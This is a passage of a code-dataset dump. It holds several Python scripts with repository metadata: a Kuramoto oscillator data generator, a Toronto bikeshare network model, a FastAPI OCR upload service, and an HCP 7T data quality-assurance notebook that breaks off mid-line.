"call"}, {"api_name": "pygame.draw", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.draw.aalines", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.draw.aalines", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.draw.aalines", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "33563734214", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 20 12:54:50 2019\n\n@author: mpanaggio\n\"\"\"\n\n\nimport learn_kuramoto_files as lk\nimport numpy as np\nimport importlib as imp\nimport pandas as pd\nimport time\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimp.reload(lk)\n\n##############################################################################\n## define model parameters\nnum_osc=10\nmu_freq=0.0 # mean natural frequency\nsigma_freq=0.01 # std natural frequency\np_erdos_renyi=0.9 # probability of connection for erdos renyi\nrandom_seed=-1 # -1 to ignore\ncoupling_function=lambda x: np.sin(x)#+0.1*np.sin(2*(x+0.2)) # Gamma from kuramoto model\n#coupling_function=lambda x: np.sin(x-0.2)+0.1*np.cos(2*x) # Gamma from kuramoto model\n\n##############################################################################\n## define numerical solution parameters\ndt=0.1 # time step for numerical solution\ntmax=1000*dt # maximum time for numerical solution\nnoise_level=0.0 # post solution noise added\ndynamic_noise_level=0.00 # post solution noise added\nnum_repeats=1#10 # number of restarts for numerical solution\nnum_attempts=1#5 # number of times to attempt to learn from data for each network\nnum_networks=1#10 # number of different networks for each parameter value\nmethod='euler' #'rk2','rk4','euler',\nwith_vel=False\n## Note: the loop parameter value will overwrite the value above\n\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfor network in range(1,num_networks+1):\n## create parameter dictionaries\n system_params={'w': lk.random_natural_frequencies(num_osc,mu=mu_freq,sigma=sigma_freq,seed=random_seed),\n 'A': lk.random_erdos_renyi_network(num_osc,p_value=p_erdos_renyi,seed=random_seed),\n 'K': 1.0,\n 'Gamma': coupling_function,\n 'other': str(parameter),\n #'IC': np.random.rand(num_osc)*np.pi*2, # fixed initial condition for each repeat\n 'IC': {'type': 'reset', # reset (set phase to 0) or random\n 'selection': 'fixed', #fixed or random\n 'num2perturb': 1, # integer used only when selection is random\n 'indices': [0], # list of integers, used only when selection='fixed' \n 'size': 2, # float, used only when type='random'\n 'IC': 0*np.random.rand(num_osc)*np.pi*2} # initical condition for first repeat\n }\n \n solution_params={'dt':dt,\n 'tmax':tmax,\n 'noise': noise_level,\n 'dynamic noise': dynamic_noise_level,\n 'ts_skip': 1, # don't skip timesteps\n 'num_repeats': num_repeats\n }\n \n learning_params={'learning_rate': 0.005,\n 'n_epochs': 300, #400\n 'batch_size':500,#500,\n 'n_oscillators':num_osc,\n 'dt': dt,\n 'n_coefficients': 20,\n 'reg':0.0001,\n 'prediction_method': method,\n 'velocity_fit': with_vel\n }\n t=np.arange(0,tmax,dt)[:-1].reshape(-1,1)\n phases,vel=lk.generate_data_vel(system_params,solution_params)\n n_ts=t.shape[0]\n \n \n figsize=(12,4)\n fontsize=16\n plt.figure(figsize=figsize) \n for rep in range(num_repeats):\n \n cur_t=t+rep*tmax\n cur_phases=phases[rep*n_ts:(rep+1)*n_ts]\n #lk.plot_ode_results(t,phases[rep*n_ts:(rep+1)*n_ts],figsize=(20,5),fontsize=16)\n R,Psi=lk.get_op(cur_phases)\n plt.subplot(1,3,1)\n plt.plot(cur_t,cur_phases)\n plt.title('Phases',fontsize=fontsize)\n plt.xlabel('time',fontsize=fontsize)\n plt.ylabel('phases',fontsize=fontsize)\n plt.subplot(1,3,2)\n plt.plot(cur_t,R,'b')\n plt.title('Order parameter',fontsize=fontsize)\n plt.xlabel('time',fontsize=fontsize)\n plt.ylabel('R(t)=|Z(t)|',fontsize=fontsize)\n plt.ylim(0,1.1)\n plt.subplot(1,3,3)\n plt.plot(cur_t,Psi,'b')\n plt.title('Order parameter',fontsize=fontsize)\n plt.xlabel('time',fontsize=fontsize)\n plt.ylabel(r'$\\Psi(t)=arg(Z(t))$',fontsize=fontsize)\n plt.ylim(-np.pi,np.pi)\n if rep>=1:\n for subplot in range(1,4):\n ax=plt.subplot(1,3,subplot)\n ylim=ax.get_ylim()\n ax.axvline(x=rep*tmax,ymin=ylim[0],ymax=ylim[1],color='k',linestyle='--')\n plt.show()\n", "repo_name": "mpanaggio/coupled_oscillator_network_model_reconstruction", "sub_path": "test_data_generation.py", "file_name": "test_data_generation.py", "file_ext": "py", "file_size_in_byte": 4489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "importlib.reload", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 43, "usage_type": "call"}, {"api_name": "learn_kuramoto_files.random_natural_frequencies", "line_number": 47, "usage_type": "call"}, {"api_name": "learn_kuramoto_files.random_erdos_renyi_network", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 79, "usage_type": "call"}, {"api_name": "learn_kuramoto_files.generate_data_vel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "learn_kuramoto_files.get_op", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "59773328", "text": "#PROJECT: MODELING TORONTO BIKESHARE NETWORK\r\n\r\n#Notes: \r\n\r\n#station info JSON: https://tor.publicbikesystem.net/ube/gbfs/v1/en/station_information\r\n\r\n#--------------------------------------------------#\r\n\r\n#1) IMPORT LIBRARIES\r\n\r\n#Computation and Structuring:\r\n\r\nimport pandas as pd\r\nimport json\r\nfrom pandas.io.json import json_normalize\r\n\r\n#Modeling:\r\n\r\nimport networkx as nx\r\n\r\n#Visualization:\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n#--------------------------------------------------#\r\n\r\n#1) DATA IMPORT AND PREP\r\n\r\n#First we load the node data from a JSON file containing all of the station's in the Toronto bike network:\r\n\r\n#The JSON was in a deep embedded format and not working with Pandas read_json, so needed to take a more manual approach (i.e. can't use pd.read_json):\r\n\r\ndef unpack_json(filename):\r\n \"\"\"function to unpack the JSON file format provided by the Toronto bikeshare network \"\"\"\r\n \r\n with open(filename) as json_file: \r\n inter_data = json.load(json_file)\r\n \r\n inter_data = json_normalize(inter_data['data'])\r\n inter_data = list(inter_data.values.flatten()) #creates a list of a list of dictionaries\r\n inter_data = inter_data[0] #unpacks so it is a list of dictionaries since all data data was in a list object at index[0]\r\n inter_data_df = pd.DataFrame(inter_data) #convert the list of dictionaires into a df, which is now properly formatted\r\n \r\n return inter_data_df\r\n\r\nnode_data_function = unpack_json('station_info.json') #gets information on station's and locations\r\nnode_data_final = node_data_function[['address','capacity','lat','lon','name','station_id']] #only keep relevant columns, this is our final cleaned node data set we can use to build the graph\r\n\r\n#Now we load the edge data, which consists of an excel file with ride level data:\r\n\r\nedge_data = pd.read_excel('2016_Bike_Share_Toronto_Ridership_Q4.xlsx')\r\n\r\n#clean edge data and join to station id information from the node_data file:\r\n\r\ndef clean_edge_data(df1, df2):\r\n \"\"\"cleans and reformats the edge data set so that node information is included\"\"\"\r\n \r\n edge_data_final = pd.merge(df1,df2[['name','station_id']].rename(columns={'name':'from_station_name'}),how='left',on='from_station_name') #add station_id from the node data to the trip level data \r\n edge_data_final = edge_data_final.rename(columns={'station_id':'station_id_from'}) #rename station_id column\r\n edge_data_final = pd.merge(edge_data_final,df2[['name','station_id']].rename(columns={'name':'to_station_name'}),how='left',on='to_station_name') #add station_id from the node data to the trip level data \r\n edge_data_final = edge_data_final.rename(columns={'station_id':'station_id_to'}) #rename station_id column\r\n edge_data_final = edge_data_final.dropna(subset=['station_id_to', 'station_id_from']) #drops edges where station id info is missing\r\n edge_data_final['station_id_from'] = pd.to_numeric(edge_data_final['station_id_from'], downcast='integer') #match to format of station_id in node data set\r\n edge_data_final['station_id_to'] = pd.to_numeric(edge_data_final['station_id_to'], downcast='integer') #match to format of station_id in node data set\r\n \r\n return edge_data_final\r\n\r\nedge_data_final2 = clean_edge_data(edge_data, node_data_final) #creates final cleaned edge data set ready for creating the network\r\n\r\n#--------------------------------------------------#\r\n\r\n#2) Structure the Bikeshare network as a NetworkX Graph:\r\n\r\nNG = nx.MultiDiGraph() #creates empty directed graph\r\n\r\n#create nodes in the graph from station_id and give them a position that is equal to their lat-lon coordinates\r\n\r\nfor i, j, k in zip(node_data_final['station_id'], node_data_final['lon'], node_data_final['lat']):\r\n NG.add_node(i,pos=(j,k)) #iterates through the node data file to and \r\n\r\npos= nx.get_node_attributes(NG, 'pos') #set position attribute for drawing\r\nprint(pos) #check the dictionary format is correct\r\n\r\n#loop through the edge pairs and add to graph:\r\nfor i, j in zip(edge_data_final2['station_id_from'], edge_data_final2['station_id_to']):\r\n NG.add_edge(i,j) #iterates through edge_data and adds edges to the graph\r\n \r\n#--------------------------------------------------#\r\n\r\n#3) Analysis and Visualization: \r\n \r\n#Some high level stats for the network:\r\n \r\nprint('# of edges: {}'.format(NG.number_of_edges())) #~147k\r\nprint('# of nodes: {}'.format(NG.number_of_nodes())) #336 nodes, matches number of stations\r\nprint(NG.degree(node_data_final['station_id'])) #look at most important nodes in network\r\nprint(nx.in_degree_centrality(NG)) #computes the in-degree centrality for nodes in the directed network\r\nprint(nx.out_degree_centrality(NG)) #coputes the out-degree centrality for nodes in the directed network\r\n\r\n#visualization of the network in physical space (using the lat-lon coordinate attributes):\r\n\r\nplt.axis('off')\r\nnx.draw(NG,pos,node_size=20,node_color='blue',alpha=0.5,width=0.5)\r\n\r\n\r\n", "repo_name": "7cb15/Modeling-Toronto-Bikeshare-Network", "sub_path": "BikeShareModeling.py", "file_name": "BikeShareModeling.py", "file_ext": "py", "file_size_in_byte": 4953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.io.json.json_normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 64, "usage_type": "call"}, {"api_name": "networkx.MultiDiGraph", "line_number": 74, "usage_type": "call"}, {"api_name": "networkx.get_node_attributes", "line_number": 81, "usage_type": "call"}, {"api_name": "networkx.in_degree_centrality", "line_number": 97, "usage_type": "call"}, {"api_name": "networkx.out_degree_centrality", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "networkx.draw", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "20752848565", "text": "from functools import lru_cache\nfrom fastapi import FastAPI, UploadFile, File, Depends, HTTPException\nfrom fastapi import responses\nfrom fastapi.responses import FileResponse, JSONResponse\nfrom typing import List, Optional\nimport pytesseract\nimport pathlib\nfrom os import getcwd\nimport os\nimport io\nimport uuid\nimport shutil\nfrom PIL import Image\nimport sys\nimport logging\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseSettings, BaseModel\nfrom random import randint\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\",\n]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\npytesseract.pytesseract.tesseract_cmd ='C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\n\nBASE_DIR = pathlib.Path(__file__).parent\nUPLOAD_DIR = BASE_DIR / \"uploads\"\n\nclass Settings(BaseSettings):\n debug: bool = False\n echo_active: bool = False\n\n class Config:\n env_file = \".env\"\n\nclass PredictionResponse(BaseModel):\n filename: str\n contentype: Optional[str] = None \n likely_class: Optional[str] = None\n\n@lru_cache\ndef get_settings():\n return Settings()\n\nsettings = get_settings()\nDEBUG = settings.debug\n\nprint(DEBUG)\n\n@app.post(\"/upload\", response_class=FileResponse, responses={200: {\"Description\": \"Uploading Images\"}})\nasync def upload_file(file: UploadFile = File(...), settings: Settings=Depends(get_settings)):\n if not settings.echo_active:\n raise HTTPException(detail=\"Invalid endpoint\", status_code=400)\n UPLOAD_DIR.mkdir(exist_ok=True)\n bytes_str = io.BytesIO(await file.read())\n #img = Image.open(bytes_str) #opencv can be used here, also called cv2\n try:\n img = Image.open(bytes_str)\n except:\n raise HTTPException(detail=\"Invalid image\", status_code=400)\n fname = pathlib.Path(file.filename)\n fext = fname.suffix # .jpg, .txt\n dest = UPLOAD_DIR / f\"{file.filename}\"\n # {uuid.uuid1()}{fext}\n with open(str(dest), 'wb') as out:\n out.write(bytes_str.read())\n img.save(dest)\n print(settings.debug)\n return dest\n\n@app.post(\"/predictions\") # http POST\nasync def prediction_view(file:UploadFile = File(...), settings:Settings = Depends(get_settings)):\n \n try:\n contents = await file.read()\n image = Image.open(io.BytesIO(contents)).convert('RGB')\n\n predicted_class = pytesseract.image_to_string(image)\n predictions = [x for x in predicted_class.split(\"\\n\")]\n \n logging.info(f\"Predicted Class: {predictions}\")\n\n # --\n\n bytes_str = io.BytesIO(contents)\n try:\n img = Image.open(bytes_str)\n except:\n raise HTTPException(detail=\"Invalid image\", status_code=400)\n \n try:\n img.save(getcwd() + f\"/images/{file.filename}\")\n except FileExistsError:\n pass\n\n # --\n\n # Save to file\n \n try:\n my_file_location = getcwd() + f\"/images/{file.filename}.txt\"\n my_file = open(my_file_location, \"w\")\n\n print(\"begin write\")\n\n for text in predictions:\n my_file.write(f\"{str(text)}\\n\")\n\n print(\"END WRITE\")\n my_file.close()\n print(\"close success\")\n\n except Exception as e:\n print(\"error\", e)\n \n # ---\n\n\n return {\n \"filename\": file.filename, \n \"contentype\": file.content_type, \n \"likely_class\": predictions,\n \"text_link\": f\"http://127.0.0.1:8000/file/{file.filename}.txt\",\n \"link\": f\"http://127.0.0.1:8000/file/{file.filename}\"\n }\n except Exception as error:\n logging.exception(error)\n e = sys.exc_info()[1]\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.post(\"/predict/\", response_model=PredictionResponse)\nasync def predict(file: UploadFile = File(...)): \n # if file.content_type.startswith('/images/') is False:\n # raise HTTPException(status_code=400, detail=f'File \\'{file.filename}\\' is not an image.') \n\n try:\n contents = await file.read()\n image = Image.open(io.BytesIO(contents)).convert('RGB')\n\n predicted_class = pytesseract.image_to_string(image)\n predictions = [x for x in predicted_class.split(\"\\n\")]\n \n logging.info(f\"Predicted Class: {predictions}\")\n return {\n \"filename\": file.filename, \n \"contentype\": file.content_type, \n \"likely_class\": predicted_class,\n }\n except Exception as error:\n logging.exception(error)\n e = sys.exc_info()[1]\n raise HTTPException(status_code=500, detail=str(e))\n\n@app.post(\"/uploads\")\nasync def upload_files(file: UploadFile = File(...)):\n with open(file.filename, 'wb') as image:\n content = await file.read()\n image.write(content)\n image.close()\n return JSONResponse(content={\"filename\": file.filename},\nstatus_code=200)\n\n@app.post(\"/img\")\nasync def upload_img(files: List[UploadFile] = File(...)):\n # UPLOAD_DIR.mkdir(exist_ok=True)\n for img in files:\n with open(f'{img.filename}', \"wb\") as buffer:\n shutil.copyfileobj(img.file, buffer)\n\n return {\"file_name\" : \"Images Uploaded\"}\n\n@app.post(\"/upload-file/\")\nasync def create_upload_file(uploaded_file: UploadFile = File(...)):\n print(\"execute\")\n\n file_location = f\"images/{uploaded_file.filename}\"\n with open(file_location, \"wb+\") as file_object:\n shutil.copyfileobj(uploaded_file.file, file_object) \n return {\"info\": f\"file '{uploaded_file.filename}' saved at '{file_location}'\",\n \"link\": f\"http://127.0.0.1:8000/file/{uploaded_file.filename}\" }\n\n@app.get(\"/images/\")\nasync def read_random_file():\n\n # get a random file from the image directory\n files = os.listdir(UPLOAD_DIR)\n random_index = randint(0, len(files) - 1)\n\n path = f\"{UPLOAD_DIR}{files[random_index]}\"\n \n # notice you can use FileResponse now because it expects a path\n return FileResponse(path)\n\n@app.get(\"/file/{name_file}\")\ndef get_file(name_file: str):\n return FileResponse(path=getcwd() + \"/images/\" + name_file)\n\n\n\"\"\"\n@app.post(\"/test/\")\nasync def get_file(uploaded_file: UploadFile = File(...)):\n print(\"receive\", uploaded_file.filename)\n return JSONResponse({\"state\": \"success\"})\n\"\"\"\n", "repo_name": "Angelvicks/vision-ai", "sub_path": "Backend/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 20, "usage_type": "call"}, {"api_name": "fastapi.middleware.cors.CORSMiddleware", "line_number": 26, "usage_type": "argument"}, {"api_name": "pytesseract.pytesseract", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "pydantic.BaseSettings", "line_number": 39, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "functools.lru_cache", "line_number": 51, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 61, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 63, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 68, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 70, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 71, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 60, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 82, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 82, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 86, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 86, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 86, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 88, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 91, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 95, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 97, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 99, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 137, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 138, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 139, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 143, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 143, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 149, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 149, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 149, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 151, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 161, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 162, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 163, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 166, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 166, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 175, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 175, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 175, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 179, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 184, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 184, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 189, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 197, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 203, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 207, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 207, "usage_type": "call"}]} +{"seq_id": "8545020554", "text": "# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.9.1\n# kernelspec:\n# display_name: hcp7t_fv_sleep_env\n# language: python\n# name: hcp7t_fv_sleep_env\n# ---\n\n# # Data Quality Assurance - Part 1\n#\n# This notebook will perform the following steps:\n#\n# 1. Load a list of subjects of interest (i.e., those with at least one resting-state scan at 7T)\n# 2. Load motion estimates and compute Framewise Displacement (saves FD to disk on each run folder)\n# 3. Attempt loading of ET files for each run (and mark those that are defective)\n# 4. Construct a dataframe with the following information per run: correct number of TRs, correct spatial resolution, correct number of volumes, ET available, ET can be loaded\n#\n# A summary of this QA is saved to disk in ${RESOURCES_DIR}/QA_Part1_Results.pkl\n# ***\n\n# +\n# %%time\nfrom utils.basics import get_7t_subjects, load_motion_info\nfrom utils.variables import RUNS, DATA_DIR, ProjectFiles_DF_Path, QA1_Results_DF_Path\nfrom utils.ParseEyeLinkAsc import ParseEyeLinkAsc\n\nimport numpy as np\nimport pandas as pd\nimport os.path as osp\nimport nibabel as nib\n\nVERBOSE=False\n# -\n\n# *** \n# ## 1. Check the Dataframe with information about available files\n\nProjectFiles_DF = pd.read_pickle(ProjectFiles_DF_Path)\nprint('++ INFO: Shape of Project Files_DF is %s' % str(ProjectFiles_DF.shape))\n\nprint('++ INFO: Number of Runs with ET(asc) file available: %d Runs' % (ProjectFiles_DF.shape[0] - ProjectFiles_DF['ET_ASC'].isna().sum()))\nprint('++ INFO: Number of Runs with ET(csv) file available: %d Runs' % (ProjectFiles_DF.shape[0] - ProjectFiles_DF['ET_CSV'].isna().sum()))\n\n# ***\n# ## 2. Load List of Subjects of interest\n\n# Load List of Subjects with at least one resting-state scan\nsbjs = get_7t_subjects()\nprint('++ Number of available subjects: %d' % len(sbjs))\n\n# ***\n# ## 4. Load Motion Information and Compute FrameWise Displacement\n# This will generate a file per run with the traces of framewise displacepment for that particular run\n\n# %%time\n# Load Motion Information for all subjects available and create FD data frame for each run\nmot_df = load_motion_info(sbjs, write_FD=True, fillnan=False, verbose=VERBOSE)\n\nprint('++ INFO: Shape of mot_df is %s' % str(mot_df.shape))\nmot_df.head()\n\n# ***\n# ## 5. Check the Integrity of Eye Tracker Data Files & See if FD is low\n#\n# Unfortunately, not all eye tracking data files can be loaded properly. \n#\n# During this initial QA, we will test whether or not a given ET file (e.g., that of one run) can be properly loaded or not\n#\n# In addition we will also store the previously computed Mean and Max Framewise Displacement\n\n# +\n# %%time\n# Create Eamty DataFrame with the following columns:\n# * Sbj = Subject ID\n# * Run = Run ID\n# * Dir Avail = Does the directory for this run exists on our system?\n# * Mot Avail = Is the motion file for this run available on our system?\n# * ET Avail = Are both ET files for this run available on our system?\n# * ET_OK = Are we able to load (e.g., file is uncorrupted) the main ET File\ndf = pd.DataFrame(columns=['Sbj','Run','Dir Avail','Mot Avail','ET Avail', 'ET_OK'])\n\n# For all subjects\nfor s,sbj in enumerate(sbjs):\n # For all possible runs\n for run in RUNS:\n # Create the path to this run directory (should it exists)\n drun_path = osp.join(DATA_DIR,str(sbj),run)\n if osp.exists(drun_path):\n # Create the path to the motion file (should it exists)\n mot_path = osp.join(drun_path,'{run}_Movement_Regressors.txt'.format(run=run))\n # Create the path to the \n et_asc_path = osp.join(drun_path,'{run}_eyetrack.asc'.format(run=run))\n et_csv_path = osp.join(drun_path,'{run}_eyetrack_summary.csv'.format(run=run))\n # Try loading the ET file without causing any type of exception\n if osp.exists(et_asc_path):\n try:\n dfTrial,dfMsg,dfFix,dfSacc,dfBlink,dfSamples = ParseEyeLinkAsc(et_asc_path)\n et_ok = True\n except: # If there was any issue (e.g., an exception), then set et_ok to False\n et_ok = False\n # Update the dataframe with the information about this run\n df = df.append({'Sbj':sbj,\n 'Run':run,\n 'Dir Avail':osp.exists(drun_path),\n 'Mot Avail':osp.exists(mot_path),\n 'ET Avail':osp.exists(et_asc_path ) & osp.exists(et_csv_path),\n 'ET_OK': et_ok}, \n ignore_index=True)\n if VERBOSE:\n print('INFO: Just finsished with subject {sbj} run {run}'.format(sbj=sbj, run=run))\n else: \n print('WARNING: Subject {sbj} run {run} does not exists'.format(sbj=sbj, run=run))\ndf = df.infer_objects()\n# -\n\n# ***\n# ## 6. Check the spatial resolution and length of the scans\n\nrun_list = [str(row['Sbj'])+'_'+row['Run'] for r,row in 